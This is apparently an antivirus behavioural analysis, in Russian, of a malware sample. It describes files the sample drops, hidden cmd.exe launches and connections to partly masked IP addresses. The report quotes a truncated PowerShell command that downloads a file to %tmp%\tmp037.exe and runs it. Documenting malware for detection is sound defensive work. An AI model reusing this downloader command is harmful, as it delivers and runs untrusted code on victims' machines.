Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $sl как %temp%\tmp037.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#begin#>function sawask([string] $sl){(new-object system.net.webclient).downloadfile($sl,''%tmp%\tmp037.exe'');<#add info#>start-process ''%tmp%\tmp037.exe'';}try{...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1136701.cvr
- %TEMP%\tmp294.bat
Сетевая активность
Подключается к
- '46.##3.218.70':80
- '46.##3.218.72':80
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#begin#>function sawask([string] $sl){(new-object system.net.webclient).downloadfile($sl,''%tmp%\tmp037.exe'');<#add info#>start-process ''%tmp%\tmp037.exe'';}try{...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp294.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp294.bat" "
